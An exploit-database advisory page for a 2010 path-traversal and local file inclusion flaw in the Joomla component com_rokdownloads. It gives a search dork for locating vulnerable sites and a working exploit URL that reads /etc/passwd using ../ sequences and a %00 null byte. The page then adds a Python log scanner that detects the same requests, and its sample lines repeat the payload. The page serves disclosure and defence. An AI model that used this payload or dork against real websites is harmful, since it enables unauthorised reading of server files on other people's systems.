Joomla Component com_rokdownloads Local File Inclusion Vulnerability

2010.03.25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Joomla Component com_rokdownloads Local File Inclusion
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"
####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_rokdownloads&controller=[LFI]

www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00

####################################################################
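Detection sketch for the request pattern above, added here as an example (not part of the original advisory or of the component's code): it scans web access log lines for com_rokdownloads requests whose controller value contains a traversal segment, a null byte, or anything other than a bare identifier. The combined log format, the identifier rule and the controller name "files" are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: a legitimate controller name is a short plain identifier.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]{1,64}")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode a bounded number of times so nested encoding is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_controller(raw):
    """Return the reasons a controller value looks like file inclusion (empty if clean)."""
    value = fully_decode(raw)
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")        # the %00 terminator from the advisory
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")        # a ../ path segment
    if not SAFE_CONTROLLER.fullmatch(value):
        reasons.append("not-identifier")   # anything that is not a bare name
    return reasons

def scan_log(lines):
    """Return (line_number, reasons) for com_rokdownloads requests with a suspicious controller."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_rokdownloads" not in map(fully_decode, params.get("option", [])):
            continue
        for raw in params.get("controller", []):
            reasons = classify_controller(raw)
            if reasons:
                hits.append((number, reasons))
    return hits

# Constructed sample lines (documentation addresses, hypothetical controller name "files").
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2010:10:00:01 +0000] "GET /index.php?option=com_rokdownloads&controller=files HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Mar/2010:10:00:07 +0000] "GET /index.php?option=com_rokdownloads&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.44 - - [25/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_rokdownloads&controller=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1843',
    '192.0.2.10 - - [25/Mar/2010:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9001',
]
```

Calling scan_log(SAMPLE_LOG) flags lines 2 and 3 only. The same identifier rule, applied to the controller parameter before it reaches any include path, is the server-side counterpart of this check.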

References:

http://www.securityfocus.com/bid/38741
http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released
http://xforce.iss.net/xforce/xfdb/56898
http://www.exploit-db.com/exploits/11760
http://secunia.com/advisories/38982
http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txt
http://osvdb.org/62972



Copyright 2024, cxsecurity.com

 
